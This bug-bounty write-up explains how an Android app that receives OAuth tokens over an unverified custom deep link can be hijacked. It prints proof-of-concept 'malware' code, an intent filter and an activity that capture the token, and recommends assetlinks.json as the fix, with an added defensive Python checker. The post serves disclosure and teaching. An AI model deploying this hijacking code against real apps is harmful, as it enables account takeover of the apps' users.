TALE OF A VULNERABILITY WHICH LEADS TO ACCOUNT TAKEOVER OF GOVERNMENT ANDROID APPLICATION
2021-12-07 18:21:54 Author: infosecwriteups.com

cappriciosecurities

AGENDA:

. THINGS YOU SHOULD KNOW TO UNDERSTAND THE VULNERABILITY

. DESCRIPTION OF THIS VULNERABILITY

. STEPS TO IDENTIFY

. IMPACT

. CONCLUSION

THINGS TO KNOW TO UNDERSTAND THE VULNERABILITY

1. WHAT IS A DEEP LINK AND HOW DO DEEP LINKS WORK

2. A BASIC UNDERSTANDING OF OAuth

I REQUEST YOU TO READ MY PREVIOUS BLOG TO UNDERSTAND THE WORKING PRINCIPLE OF THIS VULNERABILITY.

DESCRIPTION:

THESE KINDS OF BUGS OCCUR IN MOBILE APPLICATIONS THAT INTEGRATE OAUTH LOGIN WITH A CUSTOM DEEP LINK. IF THE APPLICATION TRUSTS THAT CUSTOM DEEP LINK TO DELIVER THE OAUTH TOKEN, THE VULNERABILITY CAN BE EXPLOITED.

MISCONFIGURED O-AUTH DEEPLINK WHICH LEADS TO ACCOUNT TAKEOVER

NOTE: THE APPLICATION NAME CANNOT BE DISCLOSED PUBLICLY. Throughout this blog it is referred to as the “vulnerable app”.

This application offers three OAuth login options:

. Google OAuth

. Microsoft OAuth

. Apple ID OAuth

Consider this scenario:

When the user opens the vulnerable application and tries to log in with OAuth (specifically Microsoft OAuth), the app launches the default browser on the mobile device, which asks for Microsoft credentials. On successful login, the browser automatically redirects back to the application through a custom deep link, and this custom deep link carries the user's OAuth token.

In the previous blog < link > I have already mentioned that some Android applications are vulnerable to this attack when the deep link is not properly configured.

Action performed: If the deep-link malware application from the previous blog is adapted to the vulnerable application's deep link, it can hijack the vulnerable application's OAuth deep link.

Now, with the malware application installed on my mobile, the same login process is repeated, but this time the malware application receives the deep link, and with it a valid OAuth token. That is all it takes: the OAuth deep link has been hijacked.

For a clearer understanding:

This is an example of what the deep link looks like:

vulnerableapp://login?token=ffdryur6iukit7tu756

STEPS TO IDENTIFY:

1. CHECK WHETHER THE APPLICATION OFFERS OAUTH LOGIN, AND WHETHER IT OPENS A MOBILE BROWSER WHEN YOU TRY TO LOG IN WITH OAUTH.

2. CHECK WHETHER THE assetlinks.json FILE IS PRESENT ON THE APPLICATION'S DOMAIN, i.e. https://vulnerable.com/.well-known/assetlinks.json. IF THIS FILE IS NOT PRESENT, THE APP MAY BE VULNERABLE.

3. CREATE THE MALWARE APPLICATION WITH THE SAME DEEP LINK AS THE VULNERABLE APP, THEN TRY TO LOG IN WITH OAUTH.

MALWARE CODE

Add this intent filter to the activity in AndroidManifest.xml, using the vulnerable app's deep link scheme and host (the VIEW action and the DEFAULT and BROWSABLE categories are what let the browser's redirect reach the activity):

<intent-filter>
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <category android:name="android.intent.category.BROWSABLE" />
    <data android:scheme="vulnerableapp" android:host="login" />
</intent-filter>

MainActivity.java code:

import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.widget.TextView;

@Override
public void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.main);
    TextView text = (TextView) findViewById(R.id.tid);
    // The full deep-link URI (scheme, host and query, token included) arrives as the intent data
    Intent intent = getIntent();
    Uri data = intent.getData();
    // data is null when the activity is opened from the launcher instead of via the deep link
    text.setText(data != null ? data.toString() : "no deep link received");
}

This code reads the deep-link data from the launching intent and shows it in the malware app's text view; the malware app does not need any permission to perform this attack.

IMPACT:

USING THIS FLAW, THERE IS A HIGH POSSIBILITY OF TAKING OVER THE ACCOUNT, SINCE THE OAUTH TOKEN IS DELIVERED TO THE MALWARE APPLICATION.

CONCLUSION:

To fix this, add the .well-known/assetlinks.json file to the authorized domain so that the deep link can be verified as belonging to the application. Any OAuth login activity should be performed within that application only; if you are asked to enter credentials in an unknown third-party application, it is not safe to log in.
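The remediation above, as an added example that is not part of the original post: a Python helper that builds the assetlinks.json statement for a package and signing-certificate fingerprint, and checks a served file the way Android's App Links verifier does (approximately). The package name and fingerprint are constructed placeholders, not values from the vulnerable app.

```python
import json
import re

# A SHA-256 signing-certificate fingerprint as printed by `keytool -list -v`
# or `apksigner verify --print-certs`: 32 colon-separated hex byte pairs.
FINGERPRINT_RE = re.compile(r"^([0-9A-F]{2}:){31}[0-9A-F]{2}$")

# Constructed example values; in practice they come from the app's
# signing certificate, not from this script.
EXAMPLE_PACKAGE = "com.example.vulnerableapp"
EXAMPLE_FINGERPRINT = ":".join(["AB"] * 32)  # placeholder, not a real cert


def build_assetlinks(package_name, fingerprints):
    """Return the JSON document to serve at https://<domain>/.well-known/assetlinks.json.

    Paired with an https:// intent-filter marked android:autoVerify="true",
    this lets Android verify that only the app signed with a listed
    certificate may claim the login redirect; a custom scheme such as
    vulnerableapp:// offers no such verification.
    """
    for fp in fingerprints:
        if not FINGERPRINT_RE.match(fp.upper()):
            raise ValueError(f"not a SHA-256 certificate fingerprint: {fp}")
    statement = {
        "relation": ["delegate_permission/common.handle_all_urls"],
        "target": {
            "namespace": "android_app",
            "package_name": package_name,
            "sha256_cert_fingerprints": [fp.upper() for fp in fingerprints],
        },
    }
    return json.dumps([statement], indent=2)


def app_is_authorized(assetlinks_doc, package_name, fingerprint):
    """Approximate the check Android's verifier performs: does any statement
    grant handle_all_urls to exactly this package and signing certificate?"""
    try:
        statements = json.loads(assetlinks_doc)
    except json.JSONDecodeError:
        return False  # unparsable or missing file: no verification at all
    for st in statements if isinstance(statements, list) else []:
        target = st.get("target", {})
        listed = [f.upper() for f in target.get("sha256_cert_fingerprints", [])]
        if ("delegate_permission/common.handle_all_urls" in st.get("relation", [])
                and target.get("namespace") == "android_app"
                and target.get("package_name") == package_name
                and fingerprint.upper() in listed):
            return True
    return False
```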

I hope you now understand the impact of this vulnerability. If you wish to learn about mobile app bug bounty, check out the link below.

link

university link https://university.cappriciosec.com/

Credits

VULNERABILITY DISCOVERED By:- karthithehacker (Karthikeyan.V)

WRITER:- AGNES RUSALIYA

-Thank you


Article source: https://infosecwriteups.com/tale-of-a-vulnerability-which-leads-to-account-takeover-of-government-android-application-998eaf5adb4d?source=rss----7b722bfd1b8d--bug_bounty